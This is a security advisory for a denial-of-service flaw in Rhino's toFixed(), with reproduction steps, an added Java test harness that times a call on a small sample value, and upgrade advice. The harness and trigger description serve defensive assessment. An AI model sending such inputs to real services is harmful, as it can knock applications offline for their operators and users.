Rhino High CPU Consumption Vulnerability in toFixed() Function Leading to Denial-of-Service
Vulnerability
A denial-of-service vulnerability has been identified in Rhino, an open-source JavaScript implementation in Java, affecting versions prior to 1.8.1, 1.7.15.1, and 1.7.14.1. The issue arises when an application passes an attacker-controlled floating-point number to the toFixed() function: for certain small values the call consumes CPU for an excessive amount of time, which disrupts normal application performance and leads to a denial-of-service condition. The root cause lies in how small numbers are converted to fixed-point decimal strings. The call stack runs through NativeNumber.numTo, DToA.JS_dtostr, DToA.JS_dtoa, and DToA.pow5mult; pow5mult is asked to raise 5 to an extremely high power, and computing that power is what overloads the CPU. Because the work happens inside native Java conversion code rather than in interpreted JavaScript, it is not subject to Rhino's usual script-level controls, and a single call is enough to tie up the thread.
Impact
Exploitation of this vulnerability can lead to significant CPU resource consumption, causing a denial-of-service condition where the application becomes unresponsive or slow.
Reproduction
To reproduce this vulnerability, pass a small, attacker-controlled floating-point number to the toFixed() function in an affected Rhino version. The number is processed through the internal conversion functions listed above, and the call does not return promptly because pow5mult raises 5 to an excessive power. In practice the number does not have to appear in script source; any value the application parses from untrusted input (a request parameter, a JSON field) and later formats with toFixed() reaches the same code path.
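The following Java harness is an added example and is not code from the advisory or from the Rhino project. It evaluates a toFixed() call inside Rhino on a worker thread and reports whether the call returns within a wall-clock budget, which is the practical way to check whether a deployed Rhino build is affected. The sample value and digit count are constructed test inputs (the advisory only says that small numbers trigger the path), and the budget of two seconds is an assumption: a healthy Rhino formats any double in well under a millisecond. It uses only public Rhino API (org.mozilla.javascript.Context) and the JDK.

```java
import java.util.concurrent.ExecutionException;
import java.util.concurrent.ExecutorService;
import java.util.concurrent.Executors;
import java.util.concurrent.Future;
import java.util.concurrent.TimeUnit;
import java.util.concurrent.TimeoutException;
import org.mozilla.javascript.Context;
import org.mozilla.javascript.Scriptable;

public class ToFixedDosCheck {
    // Wall-clock budget for one toFixed() call (assumption). A healthy Rhino formats a
    // double in microseconds, so exceeding this budget is treated as the DoS signal.
    private static final long BUDGET_MS = 2000;

    // Constructed sample input, not a value taken from the advisory: a very small
    // magnitude so that the conversion walks the DToA small-number path.
    static final double SAMPLE_VALUE = 1e-300;
    static final int SAMPLE_DIGITS = 20;

    /** Evaluate (value).toFixed(digits) in a fresh Rhino scope and return the result. */
    static String toFixedInRhino(double value, int digits) {
        Context cx = Context.enter();
        try {
            Scriptable scope = cx.initStandardObjects();
            // The script is built from a parsed double and an int, so untrusted text
            // never reaches the evaluator; only the numeric value does.
            String src = "(" + Double.toString(value) + ").toFixed(" + digits + ")";
            Object result = cx.evaluateString(scope, src, "tofixed-check", 1, null);
            return Context.toString(result);
        } finally {
            Context.exit();
        }
    }

    /** Run the conversion on a daemon thread; false means it did not finish in time. */
    static boolean completesWithinBudget(double value, int digits) throws InterruptedException {
        ExecutorService pool = Executors.newSingleThreadExecutor(r -> {
            Thread t = new Thread(r, "rhino-tofixed");
            t.setDaemon(true); // a worker stuck in pow5mult must not keep the JVM alive
            return t;
        });
        Future<String> f = pool.submit(() -> toFixedInRhino(value, digits));
        try {
            f.get(BUDGET_MS, TimeUnit.MILLISECONDS);
            return true;
        } catch (TimeoutException e) {
            f.cancel(true); // the interrupt is not observed inside DToA; this only releases the Future
            return false;
        } catch (ExecutionException e) {
            throw new IllegalStateException("toFixed() failed", e.getCause());
        } finally {
            pool.shutdownNow();
        }
    }

    public static void main(String[] args) throws Exception {
        Context cx = Context.enter();
        String version;
        try {
            version = cx.getImplementationVersion();
        } finally {
            Context.exit();
        }
        System.out.println("Rhino build: " + version);
        boolean ok = completesWithinBudget(SAMPLE_VALUE, SAMPLE_DIGITS);
        System.out.println(ok
            ? "toFixed() returned within budget"
            : "toFixed() exceeded " + BUDGET_MS + " ms; this build looks affected");
    }
}
```

Run it against the Rhino jar on the classpath of the deployment you are assessing. Two points matter for anyone who cannot upgrade immediately. First, Rhino's instruction-count observer (setInstructionObserverThreshold / observeInstructionCount) does not help here: it is consulted between interpreted instructions, and the expensive loop is inside the native DToA conversion, so a thread-level or request-level timeout is the only runtime containment. Second, the interrupt sent by cancel(true) is likewise not observed by that code, so the thread keeps burning CPU until the conversion finishes; the harness uses a daemon thread so the process itself can still exit.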
Remediation
Users should upgrade to Rhino 1.8.1, or, if they need to stay on an older release line, to the backported fixes 1.7.15.1 or 1.7.14.1. Until the upgrade is in place, avoid passing attacker-controlled numbers to toFixed() and bound the time a script evaluation may take, since the expensive work happens in native conversion code that Rhino's script-level limits do not interrupt.
